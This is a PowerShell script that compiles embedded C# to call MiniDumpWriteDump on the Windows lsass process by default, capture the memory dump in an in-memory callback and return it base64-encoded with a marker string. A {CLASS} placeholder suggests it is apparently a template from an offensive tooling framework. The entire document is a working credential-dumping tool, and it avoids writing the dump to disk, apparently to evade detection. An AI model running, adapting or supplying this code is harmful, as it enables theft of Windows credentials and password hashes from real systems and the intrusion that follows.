Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Text;
using System.Linq.Expressions;


    public class {CLASS}
    {

            [DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall,
            CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)]
        internal static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, IntPtr hFile, uint dumpType,
            IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);

        [StructLayout(LayoutKind.Sequential, Pack = 1)]
        internal struct MINIDUMP_IO_CALLBACK
        {
            internal IntPtr Handle;
            internal ulong Offset;
            internal IntPtr Buffer;
            internal int BufferBytes;
        }

        [StructLayout(LayoutKind.Sequential, Pack = 1)]
        internal struct MINIDUMP_CALLBACK_INFORMATION
        {
            internal MinidumpCallbackRoutine CallbackRoutine;
            internal IntPtr CallbackParam;
        }

        [StructLayout(LayoutKind.Sequential, Pack = 1)]
        internal struct MINIDUMP_CALLBACK_INPUT
        {
            internal int ProcessId;
            internal IntPtr ProcessHandle;
            internal MINIDUMP_CALLBACK_TYPE CallbackType;
            internal MINIDUMP_IO_CALLBACK Io;
        }

        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        internal delegate bool MinidumpCallbackRoutine(IntPtr CallbackParam, IntPtr CallbackInput,
            IntPtr CallbackOutput);

        internal enum HRESULT : uint
        {
            S_FALSE = 0x0001,
            S_OK = 0x0000,
            E_INVALIDARG = 0x80070057,
            E_OUTOFMEMORY = 0x8007000E
        }

        internal struct MINIDUMP_CALLBACK_OUTPUT
        {
            internal HRESULT status;
        }

        internal enum MINIDUMP_CALLBACK_TYPE
        {
            ModuleCallback,
            ThreadCallback,
            ThreadExCallback,
            IncludeThreadCallback,
            IncludeModuleCallback,
            MemoryCallback,
            CancelCallback,
            WriteKernelMinidumpCallback,
            KernelMinidumpStatusCallback,
            RemoveMemoryCallback,
            IncludeVmRegionCallback,
            IoStartCallback,
            IoWriteAllCallback,
            IoFinishCallback,
            ReadMemoryFailureCallback,
            SecondaryFlagsCallback,
            IsProcessSnapshotCallback,
            VmStartCallback,
            VmQueryCallback,
            VmPreReadCallback,
            VmPostReadCallback
        }

        public static String Minidump(int pid = -1)
        {
            IntPtr targetProcessHandle;
            uint targetProcessId = 0;

            Process targetProcess = null;
            if (pid == -1)
            {
                var processes = Process.GetProcessesByName("lsass");
                targetProcess = processes[0];
            }
            else
            {
                try
                {
                    targetProcess = Process.GetProcessById(pid);
                }
                catch
                {
                    Console.WriteLine("Error with process id");
                    return "Error";
                }
            }

            try
            {
                targetProcessId = (uint)targetProcess.Id;
                targetProcessHandle = targetProcess.Handle;
            }
            catch
            {
                Console.WriteLine("\n[-] Error getting handle to {targetProcess.ProcessName} ({targetProcess.Id}):\n");

                return "Error";
            }

            try
            {


                var byteArray = new byte[60 * 1024 * 1024];
                var callbackPtr = new MinidumpCallbackRoutine((param, input, output) =>
                {
                    var inputStruct = Marshal.PtrToStructure<MINIDUMP_CALLBACK_INPUT>(input);
                    var outputStruct = Marshal.PtrToStructure<MINIDUMP_CALLBACK_OUTPUT>(output);
                    switch (inputStruct.CallbackType)
                    {
                        case MINIDUMP_CALLBACK_TYPE.IoStartCallback:
                            outputStruct.status = HRESULT.S_FALSE;
                            Marshal.StructureToPtr(outputStruct, output, true);
                            return true;
                        case MINIDUMP_CALLBACK_TYPE.IoWriteAllCallback:
                            var ioStruct = inputStruct.Io;
                            if ((int)ioStruct.Offset + ioStruct.BufferBytes >= byteArray.Length)
                            {
                                Array.Resize(ref byteArray, byteArray.Length * 2);
                            }
                            Marshal.Copy(ioStruct.Buffer, byteArray, (int)ioStruct.Offset, ioStruct.BufferBytes);
                            outputStruct.status = HRESULT.S_OK;
                            Marshal.StructureToPtr(outputStruct, output, true);
                            return true;
                        case MINIDUMP_CALLBACK_TYPE.IoFinishCallback:
                            outputStruct.status = HRESULT.S_OK;
                            Marshal.StructureToPtr(outputStruct, output, true);
                            return true;
                        default:
                            return true;
                    }
                });

                var callbackInfo = new MINIDUMP_CALLBACK_INFORMATION
                {
                    CallbackRoutine = callbackPtr, CallbackParam = IntPtr.Zero
                };

                var size = Marshal.SizeOf(callbackInfo);
                var callbackInfoPtr = Marshal.AllocHGlobal(size);
                Marshal.StructureToPtr(callbackInfo, callbackInfoPtr, false);

                if (MiniDumpWriteDump(targetProcessHandle, targetProcessId, IntPtr.Zero, (uint)2, IntPtr.Zero, IntPtr.Zero, callbackInfoPtr))
                {
                    //Console.OutputEncoding = Encoding.UTF8;
                    //Console.Write("Dump_start_from_888here:"+Convert.ToBase64String((byteArray)));
                    return "Dump_start_from_here:"+Convert.ToBase64String((byteArray)) ;

                }
                Console.WriteLine("[-] Dump failed");
                return "Error";

            }
            catch
            {
                Console.WriteLine("[-] Exception dumping process memory");
                return "Error";
            }

        }

        public static void Main(string[] args)
        {
        Console.WriteLine("dumping process memory");
        return ;


        }
    }

"@

[{CLASS}]::MiniDump(-1)